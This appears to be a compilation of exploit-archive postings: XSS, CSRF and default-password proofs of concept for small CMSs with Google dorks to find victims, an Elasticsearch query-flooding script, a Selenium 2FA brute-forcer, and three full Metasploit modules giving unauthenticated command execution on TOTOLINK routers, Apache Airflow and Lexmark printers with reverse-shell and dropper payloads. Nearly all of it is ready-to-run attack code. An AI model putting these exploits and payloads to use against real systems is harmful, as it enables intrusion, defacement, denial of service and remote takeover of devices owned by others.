<pre><code>====================================================================================================================================<br />| # Title : LogoBee CMS v0.2 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |<br />| # Vendor : https://logobee.com | <br />| # Dork : intext:''Logo & Web Design by LogoBee'' |<br />====================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine .<br /><br />[+] use payload : /updates.php?id=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee><br /><br />[+] http://vaxform127.0.0.1/updates.php?id=%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Lamano LMS v0.1 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | <br />| # Vendor : http://www.lamano.lu/ | <br />| # Dork : © 2018 Lamano by easysolutions |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] Use payload : user = admin & Pass : 1234<br /><br />[+] https://www.sylviebecker127.0.0.1lu<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code># Exploit Author: TOUHAMI KASBAOUI<br /># Vendor Homepage: https://elastic.co/<br /># Version: 8.5.3 / OpenSearch<br /># Tested on: Ubuntu 20.04 LTS<br /># CVE : CVE-2023-31419<br /># Ref: https://github.com/sqrtZeroKnowledge/Elasticsearch-Exploit-CVE-2023-31419<br /><br />import requests<br />import random<br />import string<br /><br />es_url = 'http://localhost:9200' # Replace with your Elasticsearch server URL<br />index_name = '*'<br /><br />payload = "/*" * 10000 + "\\" +"'" * 999<br /><br />verify_ssl = False<br /><br />username = 'elastic'<br />password = 'changeme'<br /><br />auth = (username, password)<br /><br />num_queries = 100<br /><br />for _ in range(num_queries):<br /> symbols = ''.join(random.choice(string.ascii_letters + string.digits + '^') for _ in range(5000))<br /> search_query = {<br /> "query": {<br /> "match": {<br /> "message": (symbols * 9000) + payload<br /> }<br /> }<br /> }<br /><br /> print(f"Query {_ + 1} - Search Query:")<br /><br /> search_endpoint = f'{es_url}/{index_name}/_search'<br /> response = requests.get(search_endpoint, json=search_query, verify=verify_ssl, auth=auth)<br /><br /> if response.status_code == 200:<br /> search_results = response.json()<br /><br /> print(f"Query {_ + 1} - Response:")<br /> print(search_results)<br /><br /> total_hits = search_results['hits']['total']['value']<br /> print(f"Query {_ + 1}: Total hits: {total_hits}")<br /><br /> for hit in search_results['hits']['hits']:<br /> source_data = hit['_source']<br /> print("Payload result: {search_results}")<br /> else:<br /> print(f"Error for query {_ + 1}: {response.status_code} - {response.text}")<br /></code></pre>
<pre><code>## Title: TASKHUB-2.8.8-XSS-Reflected<br />## Author: nu11secur1ty<br />## Date: 09/22/2023<br />## Vendor: https://codecanyon.net/user/infinitietech<br />## Software: https://codecanyon.net/item/taskhub-project-management-finance-crm-tool/25685874<br />## Reference: https://portswigger.net/web-security/cross-site-scripting<br /><br /><br />## Description:<br />The value of the JSON parameter within the project parameter is copied<br />into the HTML document as plain text between tags. The payload<br />vn5mr<img src=a onerror=alert(1)>i62kl was submitted in the JSON<br />parameter within the project parameter. This input was echoed<br />unmodified in the application's response. The already authenticated<br />(by using a USER ACCOUNT)attacker can get a CSRF token and cookie<br />session it depends on the scenarios.<br /><br /><br />STATUS: HIGH Vulnerability<br /><br />[+]Test exploit:<br /><br />```<br />surw7%3Cscript%3Ealert(1)%3C%2fscript%3E<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/infinitietech/TASKHUB-2.8.8)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2023/09/taskhub-288-xss-reflected.html)<br /><br />## Time spent:<br />01:10:00<br /><br /><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />require 'rex/stopwatch'<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'TOTOLINK Wireless Routers unauthenticated remote command execution vulnerability.',<br /> 'Description' => %q{<br /> Multiple TOTOLINK network products contain a command insertion vulnerability in setting/setTracerouteCfg.<br /> This vulnerability allows an attacker to execute arbitrary commands through the "command" parameter.<br /> After exploitation, an attacker will have full access with the same user privileges under<br /> which the webserver is running (typically as user `root`, ;-).<br /><br /> The following TOTOLINK network products and firmware are vulnerable:<br /> - Wireless Gigabit Router model X5000R with firmware X5000R_V9.1.0u.6118_B20201102.zip;<br /> - Wireless Gigabit Router model A7000R with firmware A7000R_V9.1.0u.6115_B20201022.zip;<br /> - Wireless Gigabit Router model A3700R with firmware A3700R_V9.1.2u.6134_B20201202.zip;<br /> - Wireless N Router model N200RE V5 with firmware N200RE_V5_V9.3.5u.6095_B20200916.zip;<br /> - Wireless N Router model N200RE V5 with firmware N200RE_V5_V9.3.5u.6139_B20201216.zip;<br /> - Wireless N Router model N350RT with firmware N350RT_V9.3.5u.6095_B20200916.zip;<br /> - Wireless N Router model N350RT with firmware N350RT_V9.3.5u.6139_B20201216.zip;<br /> - Wireless Extender model EX1200L with firmware EX1200L_V9.3.5u.6146_B20201023.zip; and<br /> - probably more looking at the scale of impacted devices :-(<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor<br /> 'Kazamayc https://github.com/Kazamayc', # Discovery of the vulnerability<br /> ],<br /> 'References' => [<br /> ['CVE', '2023-30013'],<br /> ['URL', 'https://attackerkb.com/topics/xnX3I3PEgM/cve-2023-30013'],<br /> ['URL', 'https://github.com/Kazamayc/vuln/tree/main/TOTOLINK/X5000R/2']<br /> ],<br /> 'DisclosureDate' => '2023-05-05',<br /> 'Platform' => ['unix', 'linux'],<br /> 'Arch' => [ARCH_CMD, ARCH_MIPSLE],<br /> 'Privileged' => true,<br /> 'Targets' => [<br /> [<br /> 'Unix Command',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_cmd,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'<br /> }<br /> }<br /> ],<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_MIPSLE],<br /> 'Type' => :linux_dropper,<br /> 'CmdStagerFlavor' => ['wget', 'echo'],<br /> 'Linemax' => 65535,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp'<br /> }<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'RPORT' => 80,<br /> 'SSL' => false<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /> register_options([<br /> OptInt.new('SLEEP', [true, 'Sleep time in seconds to test blind command injection', 3])<br /> ])<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> num = rand(1..500)<br /> return send_request_cgi({<br /> 'method' => 'POST',<br /> 'ctype' => 'application/x-www-form-urlencoded',<br /> 'uri' => normalize_uri(target_uri.path, 'cgi-bin', 'cstecgi.cgi'),<br /> 'keep_cookies' => true,<br /> 'data' => "{\"command\":\"127.0.0.1; #{cmd};#\",\"num\":\"#{num}\",\"topicurl\":\"setTracerouteCfg\"}"<br /> })<br /> end<br /><br /> def check<br /> # Checking if the target is vulnerable by executing a randomized sleep to test the remote code execution<br /> print_status("Checking if #{peer} can be exploited.")<br /> sleep_time = datastore['SLEEP']<br /><br /> # check response with echo command to determine if traceroute vulnerable function is available<br /> res = execute_command("echo #{sleep_time}")<br /> return CheckCode::Unknown('No response received from target.') unless res<br /> return CheckCode::Safe('No valid response received from target.') unless res.code == 200 && res.body.include?('success')<br /><br /> # if traceroute vulnerable function is available, perform blind command injection using the sleep comnmand<br /> print_status("Performing command injection test issuing a sleep command of #{sleep_time} seconds.")<br /> res, elapsed_time = Rex::Stopwatch.elapsed_time do<br /> execute_command("sleep #{sleep_time}")<br /> end<br /> return CheckCode::Unknown('No response received from target.') unless res<br /> return CheckCode::Safe('No valid response received from target.') unless res.code == 200 && res.body.include?('success')<br /><br /> print_status("Elapsed time: #{elapsed_time.round(2)} seconds.")<br /> return CheckCode::Safe('Blind command injection failed.') unless elapsed_time >= sleep_time<br /><br /> CheckCode::Vulnerable('Successfully tested blind command injection.')<br /> end<br /><br /> def exploit<br /> print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")<br /> case target['Type']<br /> when :unix_cmd<br /> execute_command(payload.encoded)<br /> when :linux_dropper<br /> # Don't check the response here since the server won't respond<br /> # if the payload is successfully executed.<br /> execute_cmdstager({ linemax: target.opts['Linemax'] })<br /> end<br /> end<br />end<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Luxcal Event Calendar v3.2.3 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |<br />| # Vendor : https://www.LuxSoft.eu |<br />| # Dork : powered by LuxSoft |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] The following html code create a new admin .<br /><br />[+] Go to the line 2.<br /><br />[+] Set the target site link Save changes and apply . <br /><br />[+] infected file : index.php<br /><br />[+] http://127.0.0.1/q7.3/index.php.<br /><br />[+] save code as poc.html .<br /><br /><html><br /><form method="POST" name="form0" action="http://127.0.0.1/lux/index.php?lc&editUser=y&uid=add"><br /><input type="hidden" name="uname" value="tcyber"/><br /><input type="hidden" name="email" value="g4k@hot.mail"/><br /><input type="hidden" name="new_pw" value="123456"/><br /><input type="hidden" name="userRights" value="9"/><br /><input type='submit' name='addExe' value="Add Profile"><br /></form><br /></html><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Lamano CMS v2.0 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | <br />| # Vendor : http://www.lamano.lu/ | <br />| # Dork : © 2018 Lamano by easysolutions |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] The following html code create a new admin .<br /><br />[+] Go to the line 8.<br /><br />[+] Set the target site link Save changes and apply . <br /><br />[+] infected file : admin.php<br /><br />[+] http://127.0.0.1/q73/admin.php .<br /><br />[+] save code as poc.html .<br /><br /><!DOCTYPE html><br /><html xmlns="http://www.w3.org/1999/xhtml"><br /><head profile="http://www.w3.org/2005/10/profile"><br /><br /></tr><br /> </table><br /> <br/><br/><br /> <form action="https://www.sylviebecker.127.0.0.1/lu/admin.php?action=add_user" method="POST"><br /> <table class="modif_utilisateur" border="0" cellpadding="3" cellspacing="0" width="350"><br /> <tr><br /> <td class="tah11" colspan="2" align="center"><B>Nouvel utilisateur : </B></td><br /> </tr><br /> <tr><br /> <td class="tah11" align="right">Nom d'utilisateur :</td><br /> <td class="tah11" align="left"><input type="text" name="user" class="form-control" value=""></td><br /> </tr><br /> <tr><br /> <td class="tah11" align="right">Mot de passe : </td><br /> <td class="tah11" align="left"><input type="text" name="pass" class="form-control" value=""></td><br /> </tr><br /> <tr><br /> <td class="tah11" colspan="2" align="center"><input class="btn btn-lg btn-primary" type="submit" value="Ajouter"></td><br /> </tr><br /> </table><br /> </form><br/><br/><br /><div><br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>The theme my login plugin before 1.2 does not check how often a 2FA code was wrongly entered, allowing a bruteforce of codes to bypass 2FA effectively. A working python exploit:<br /><br />from typing import KeysView<br />from selenium.webdriver.common.by import By<br />from selenium import webdriver<br />from selenium.webdriver.support.ui import WebDriverWait <br />from selenium.webdriver.support import expected_conditions as EC <br /><br />driver = webdriver.Firefox()<br />driver.get("websiteloginhere")<br /><br /># Locate the username field by its 'id' attribute and fill it in <br />username_field = driver.find_element(By.ID, "user_login") <br />username_field.click() <br />username_field.send_keys("usernamehere") <br /> <br /># Locate the password field by its 'id' attribute and fill it in <br />password_field = driver.find_element(By.ID, "user_pass") <br />password_field.click() <br />password_field.send_keys("passwordhere") <br /><br /># Locate the Log In button and click it <br />login_button = driver.find_element(By.XPATH, "//button[@name='submit' and @type='submit' and @class='tml-button']") <br />login_button.click() <br /><br /># FROM HERE, keep doing this from 000000 till 999999 or till you can not find the input anymore after waiting <br /> <br />for i in range(1000000): <br /> code = str(i).zfill(6) <br /> <br /> try: <br /> wait = WebDriverWait(driver, 10) <br /> code_field = wait.until(EC.element_to_be_clickable((By.XPATH, "//input[@name='code' and @type='text']"))) <br /> except: <br /> break <br /> <br /> code_field.click() <br /> code_field.clear() <br /> code_field.send_keys(code) <br /> <br /> verify_button = driver.find_element(By.XPATH, "//button[@name='submit' and @type='submit' and @class='tml-button']") <br /> verify_button.click()<br /><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Apache Airflow 1.10.10 - Example DAG Remote Code Execution',<br /> 'Description' => %q{<br /> This module exploits an unauthenticated command injection vulnerability<br /> by combining two critical vulnerabilities in Apache Airflow 1.10.10.<br /> The first, CVE-2020-11978, is an authenticated command injection vulnerability<br /> found in one of Airflow's example DAGs, "example_trigger_target_dag", which<br /> allows any authenticated user to run arbitrary OS commands as the user<br /> running Airflow Worker/Scheduler. The second, CVE-2020-13927, is a default<br /> setting of Airflow 1.10.10 that allows unauthenticated access to Airflow's<br /> Experimental REST API to perform malicious actions such as creating the<br /> vulnerable DAG above. The two CVEs taken together allow vulnerable DAG creation<br /> and command injection, leading to unauthenticated remote code execution.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'xuxiang', # Original discovery and CVE submission<br /> 'Pepe Berba', # ExploitDB author<br /> 'Ismail E. Dawoodjee' # Metasploit module author<br /> ],<br /> 'References' => [<br /> [ 'EDB', '49927' ],<br /> [ 'CVE', '2020-11978' ],<br /> [ 'CVE', '2020-13927' ],<br /> [ 'URL', 'https://github.com/pberba/CVE-2020-11978/' ],<br /> [ 'URL', 'https://lists.apache.org/thread/cn57zwylxsnzjyjztwqxpmly0x9q5ljx' ],<br /> [ 'URL', 'https://lists.apache.org/thread/mq1bpqf3ztg1nhyc5qbrjobfrzttwx1d' ],<br /> ],<br /> 'Platform' => ['linux', 'unix'],<br /> 'Arch' => ARCH_CMD,<br /> 'Targets' => [<br /> [<br /> 'Unix Command', { 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/python/meterpreter_reverse_tcp' } }<br /> ],<br /> ],<br /> 'Privileged' => false,<br /> 'DisclosureDate' => '2020-07-14',<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]<br /> }<br /> )<br /> )<br /> register_options(<br /> [<br /> Opt::RPORT(8080, true, 'Apache Airflow webserver default port'),<br /> OptString.new('TARGETURI', [ true, 'Base path', '/' ]),<br /> OptString.new('DAG_PATH', [<br /> true,<br /> 'Path to vulnerable example DAG',<br /> '/api/experimental/dags/example_trigger_target_dag'<br /> ]),<br /> OptInt.new('TIMEOUT', [true, 'How long to wait for payload execution (seconds)', 120])<br /> ]<br /> )<br /> end<br /><br /> def check<br /> uri = normalize_uri(target_uri.path, 'admin', 'airflow', 'login')<br /> vprint_status("Checking target web server for a response at: #{full_uri(uri)}")<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => uri<br /> })<br /><br /> unless res<br /> return CheckCode::Unknown('Target did not respond to check request.')<br /> end<br /><br /> unless res.code == 200 &&<br /> res.body.downcase.include?('admin') &&<br /> res.body.downcase.include?('_csrf_token') &&<br /> res.body.downcase.include?('sign in to airflow')<br /> return CheckCode::Unknown('Target is not running Apache Airflow.')<br /> end<br /><br /> vprint_good('Target is running Apache Airflow.')<br /><br /> vprint_status('Checking Apache Airflow version...')<br /> version_number = res.body.to_s.scan(<br /> %r{<a href="https://airflow[.]apache[.]org/docs/([\d.]+)"}<br /> ).flatten.first<br /><br /> unless version_number<br /> return CheckCode::Detected('Apache Airflow version cannot be determined.')<br /> end<br /><br /> unless Rex::Version.new(version_number) < Rex::Version.new('1.10.11')<br /> return CheckCode::Safe<br /> end<br /><br /> vprint_status(<br /> "Target is running Apache Airflow Version #{version_number}. " \<br /> 'Performing additional checks for exploitability...'<br /> )<br /><br /> check_api<br /> check_task<br /> check_unpaused<br /><br /> return CheckCode::Appears<br /> end<br /><br /> def check_api<br /> uri = normalize_uri(target_uri.path, 'api', 'experimental', 'test')<br /> vprint_status("Checking if Airflow Experimental REST API is accessible at: #{full_uri(uri)}")<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => uri<br /> })<br /><br /> unless res && res.code == 200<br /> return CheckCode::Safe('Could not access the Airflow Experimental REST API.')<br /> end<br /><br /> vprint_good('Airflow Experimental REST API is accessible.')<br /> end<br /><br /> def check_task<br /> uri = normalize_uri(target_uri.path, datastore['DAG_PATH'], 'tasks', 'bash_task')<br /> vprint_status('Checking for vulnerability of "example_trigger_target_dag.bash_task"...')<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => uri<br /> })<br /><br /> unless res && res.code == 200<br /> return CheckCode::Safe(<br /> 'Could not find "example_trigger_target_dag.bash_task". ' \<br /> 'Target is not vulnerable to CVE-2020-11978.'<br /> )<br /> end<br /><br /> if res.get_json_document['env'].include?('dag_run')<br /> return CheckCode::Safe(<br /> 'The "example_trigger_target_dag.bash_task" is patched. ' \<br /> 'Target is not vulnerable to CVE-2020-11978.'<br /> )<br /> end<br /><br /> vprint_good('The "example_trigger_target_dag.bash_task" is vulnerable.')<br /> end<br /><br /> def check_unpaused<br /> uri = normalize_uri(target_uri.path, datastore['DAG_PATH'], 'paused', 'false')<br /> vprint_status('Checking if "example_trigger_target_dag.bash_task" can be unpaused...')<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => uri<br /> })<br /><br /> unless res && res.code == 200<br /> return CheckCode::Safe(<br /> 'Could not unpause "example_trigger_target_dag.bash_task". ' \<br /> 'Example DAGs were not loaded.'<br /> )<br /> end<br /><br /> vprint_good('The "example_trigger_target_dag.bash_task" is unpaused.')<br /> end<br /><br /> def create_dag(cmd)<br /> cmd = "echo #{Base64.strict_encode64(cmd)} | base64 -d | sh"<br /> uri = normalize_uri(target_uri.path, datastore['DAG_PATH'], 'dag_runs')<br /> vprint_status('Creating a new vulnerable DAG...')<br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => uri,<br /> 'ctype' => 'application/json',<br /> 'data' => JSON.generate({ conf: { message: "\"; #{cmd};#" } })<br /> })<br /><br /> unless res && res.code == 200<br /> fail_with(Failure::PayloadFailed, 'Failed to create DAG.')<br /> end<br /><br /> print_good("Successfully created DAG: #{res.get_json_document['message']}")<br /> return res.get_json_document['execution_date']<br /> end<br /><br /> def await_execution(execution_date)<br /> uri = normalize_uri(<br /> target_uri.path,<br /> datastore['DAG_PATH'],<br /> 'dag_runs', execution_date, 'tasks', 'bash_task'<br /> )<br /> print_status('Waiting for Scheduler to run the vulnerable DAG. This might take a while...')<br /> vprint_warning('If the Bash task is never queued, then the Scheduler might not be running.')<br /><br /> i = 0<br /> loop do<br /> i += 1<br /> sleep(10)<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => uri<br /> })<br /><br /> unless res && res.code == 200<br /> fail_with(Failure::Unknown, 'Bash task state cannot be determined.')<br /> end<br /><br /> state = res.get_json_document['state']<br /> if state == 'queued'<br /> print_status('Bash task is queued...')<br /> elsif state == 'running'<br /> print_good('Bash task is running. Expect a session if executed successfully.')<br /> break<br /> elsif state == 'success'<br /> print_good('Successfully ran Bash task. Expect a session soon.')<br /> break<br /> elsif state == 'None'<br /> print_warning('Bash task is not yet queued...')<br /> elsif state == 'scheduled'<br /> print_status('Bash task is scheduled...')<br /> else<br /> print_status("Bash task state: #{state}.")<br /> break<br /> end<br /> # stop loop when timeout<br /> next unless datastore['TIMEOUT'] <= 10 * i<br /><br /> fail_with(Failure::TimeoutExpired,<br /> 'Bash task did not run within the specified time ' \<br /> "- #{datastore['TIMEOUT']} seconds.")<br /> end<br /> end<br /><br /> def exploit<br /> print_status("Executing TARGET: \"#{target.name}\" with PAYLOAD: \"#{datastore['PAYLOAD']}\"")<br /> execution_date = create_dag(payload.encoded)<br /> await_execution(execution_date)<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::Retry<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Lexmark Device Embedded Web Server RCE',<br /> 'Description' => %q{<br /> A unauthenticated Remote Code Execution vulnerability exists in the embedded webserver in certain Lexmark devices through 2023-02-19.<br /> The vulnerability is only exposed if, when setting up the printer or device, the user selects "Set up Later" when asked<br /> if they would like to add an Admin user. If no Admin user is created the endpoint `/cgi-bin/fax_change_faxtrace_settings`<br /> is accessible without authentication. The endpoint allows the user to configure a number of different fax settings.<br /><br /> A number of the configurable parameters on the page (ex. `FT_Custom_lbtrace`) fail to be sanitized properly before being<br /> used in an bash eval statement: `eval "$cmd" > /dev/null`, allowing for an unauthenticated user to run arbitrary commands.<br /> },<br /> 'Author' => [<br /> 'James Horseman', # Analysis & PoC<br /> 'Zach Hanley', # Analysis & PoC<br /> 'jheysel-r7' # Msf module<br /> ],<br /> 'References' => [<br /> [ 'URL', 'https://github.com/horizon3ai/CVE-2023-26067'],<br /> [ 'URL', 'https://publications.lexmark.com/publications/security-alerts/CVE-2023-26068.pdf'],<br /> [ 'URL', 'https://www.horizon3.ai/lexmark-command-injection-vulnerability-zdi-can-19470-pwn2own-toronto-2022/'],<br /> [ 'CVE', '2023-26068']<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'Platform' => ['unix'],<br /> 'Privileged' => false,<br /> 'Arch' => [ ARCH_CMD ],<br /> 'Targets' => [<br /> [<br /> 'Unix (In-Memory)',<br /> {<br /> 'Platform' => ['unix'],<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_cmd,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/reverse_socat_tcp'<br /> }<br /> }<br /> ]<br /> ],<br /> 'Payload' => {<br /> 'Compat' =><br /> {<br /> 'PayloadType' => 'cmd',<br /> 'RequiredCmd' => 'socat'<br /> }<br /> },<br /> 'DefaultTarget' => 0,<br /> 'DisclosureDate' => '2023-03-13',<br /> 'Notes' => {<br /> 'Stability' => [ CRASH_SAFE ],<br /> 'SideEffects' => [ ],<br /> 'Reliability' => [ REPEATABLE_SESSION ]<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> OptInt.new('SLEEP', [true, 'Sleep time to wait for the printer to wake', 10]),<br /> ]<br /> )<br /> end<br /><br /> def check<br /> send_wakeup<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, '/cgi-bin/fax_change_faxtrace_settings'),<br /> 'method' => 'GET'<br /> )<br /><br /> return Exploit::CheckCode::Unknown('The target did not respond ') unless res<br /> return Exploit::CheckCode::Safe('The target does not seem to be vulnerable') unless res.code == 200 && res.get_xml_document.xpath('//title').text == 'Fax Trace Settings'<br /><br /> Exploit::CheckCode::Appears('The vulnerable endpoint "/cgi-bin/fax_change_faxtrace_settings" is reachable')<br /> end<br /><br /> # If the printer has been inactive for some time it might be sleeping, in which case it's best to send a request<br /> # or two to wake it up before running the check method or exploit.<br /> def send_wakeup<br /> retry_until_truthy(timeout: datastore['SLEEP']) do<br /> print_status('Waking up the printer...')<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, '/cgi-bin/fax_change_faxtrace_settings'),<br /> 'method' => 'HEAD'<br /> )<br /> break if res && res.code == 200<br /> end<br /> end<br /><br /> def exploit<br /> if datastore['ForceExploit'] || !datastore['AutoCheck']<br /> send_wakeup<br /> end<br /><br /> print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, '/cgi-bin/fax_change_faxtrace_settings'),<br /> 'method' => 'POST',<br /> 'data' => "FT_Custom_lbtrace=3;$(#{payload.encoded});#"<br /> )<br /> print_error('A response to the exploit attempt was received. This indicates the exploit was likely unsuccessful') if res<br /> end<br />end<br /></code></pre>